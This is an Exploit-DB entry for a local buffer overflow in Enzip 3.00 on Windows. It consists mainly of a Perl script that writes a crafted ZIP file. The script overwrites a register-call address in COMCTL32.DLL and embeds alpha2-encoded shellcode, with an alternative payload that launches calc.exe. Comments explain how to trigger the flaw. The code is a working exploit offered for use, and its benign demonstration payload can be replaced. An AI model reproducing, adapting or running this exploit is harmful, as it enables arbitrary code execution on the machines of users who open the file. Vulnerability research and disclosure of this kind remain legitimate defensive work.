Enzip 3.00 - Local Buffer Overflow

EDB-ID:

15919

CVE:





Platform:

Windows

Date:

2011-01-06


#[+]Exploit Title: Exploit Buffer Overflow Enzip 3.00
#[+]Date: 01\06\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.bcuc.ac.uk/files/enzip300.exe
#[+]Version: 3.00
#[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN 
#[+]CVE: N/A
#
#
#Create BY C4SS!0 G0M3S
#Louredo_@hotmail.com
#Website http://www.invasao.com.br
#
#
#HOW TO:
#
#OPEN THE FILE WITH THE SPECIALLY DESIGNED ENZIP 3.00
#THEN CLICK BUTTON TO THE RIGHT ON TOP OF THE FILE NAME
#SELECT OPTION THEN OPEN THE PROGRAM SHOWS IN MY CASE Shellcode is a MessageBox ()
#
#


if($#ARGV!=0)
{
system("cls");
system("color 4f");
sub usage
{
print "\n\n".                  
      "             ||========================================||\n".
	  "             ||                                        ||\n".
	  "             ||    Exploit Buffer Overflow Enzip 3.00  ||\n".
	  "             ||    Created BY C4SS!0 G0M3S             ||\n".
	  "             ||    Louredo_\@hotmail.com                ||\n".
	  "             ||                                        ||\n".
	  "             ||========================================||\n\n\n";

	  
print "[+]Exploit: Exploit Buffer Overflow Enzip 3.00\n";
print "[+]Date: 01\\06\\2011\n";
print "[+]Author: C4SS!0 G0M3S\n";
print "[+]Home: www.invasao.com.br\n";
print "[+]Version: 3.00\n";
print "[+]Tested On: WIN-XP SP3 Portuguese Brazilian\n";
print "[+]E-mail: Louredo_\@hotmail.com\n\n";
print "[+]Note:\n\nRead the comments above to Learn How to Exploit Works\n\n\n";

}
usage;
print "[-]Usage: $0 <File Name>\n";
print "[-]Exemple: $0 exploit.zip\n";
exit(0);
	 
}
	  

my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";
usage;
print "[*]Preparing payload\n";
sleep(1);

my $payload = "\x41" x 1024;
$payload .= "BBBB"; #VALUE DE EAX
$payload .= "CCCC"; #VALUE DE EDX
$payload .= "DDDD"; #VALUE DE ECX




$payload .= "\x42" x 1022;
$payload .= pack('V',0x5D54296F); # CALL EAX COMCTL32.DLL



$payload .= "\x43" x 40;


print "[*]Identifying the length Shellcode\n";
sleep(1);

#
#
#SHELLCODE ENCODER USING ALPHA 2 BASEADDRESS EAX
#
#PROMPT:
#
#C:\alpha> alpha2 --uppercase eax < File_name.txt
#
#

$shellcode = 
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJI6SYP03O903XRWC9KPPRHR".
"LBL10Q03XWCP26N2DU8453CRE3BV4F8OKCKUMK0CL0PKO8SZ0P38R0R89QN3W6PZOK1O1TQTQB14Q0QS".
"X51E73UW22HPMCUSCT3PT0ZV2PPNYP0NNMPSLKON1VSYYVSN26SYKF1RHPSWP10WPSXQWP00MFSSXV3W".
"Q6PWPBHQ00CWDV3SXU4Q0W2RYRHRO3YD43UE8QU2XD0RLV4V9PSRHGQP0WPQ0CX73P4630SPT1KBJQP1".
"C0QPRKOHPVSYPPPONJZXJK1SLKON6A";
#
#
#OR THIS SHELLCODE WinExec("CALC.EXE",0)
#
#PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYKIPVQXIOO3L5FBPXLN9D
#46DJTNQ5N0XVQD84XK3M8KL33RXE8L4MUP02XOLSUO92XOFVCKEL3X4NNSM5RNJGJP2ELOOSRJM5M64X
#USVQ9WQKWLVSPJUT1XJDFWEZUB4O7SLKKUKUURKZP179M1XKMWRP8EKI2M8YSZW7KCJ8OPL0O7SHSPSY
#41GL7XXWKLCLNK35O0WQCSTPQY1VSXML5O6L5IQCNMHJUNJL1UUOX7VMIWMWK9PXYKN0QE1OFTNVOMUT
#YK7OGT8FOPYLP3K8W5UCOM83KYZA
#
#



print "[*]The length is Shellcode:".length($shellcode)."\n";
sleep(1);



$payload .= $shellcode; 
$payload .= "\x46" x (1568 - length($shellcode));


$payload .= "\x52\x58\x66\x05\xB2\x0B\x40\x40".
"\x40" x 10;
$payload .= "\x50\x98\xd1";


$payload .= "\x4a" x (4064 - length($payload));





$file = $ARGV[0];

$payload = $payload.".txt";
my $zip = $ldf_header.$payload.
              $cdf_header.$payload.
			  $eofcdf_header;
print "[*]Creating the File $file\n";

open(f,">$file") or die("ERROR\n$!\n");
print f $zip;
close(f);
print "[*]The File $file was Successfully Created\n";
sleep(1);
exit(0);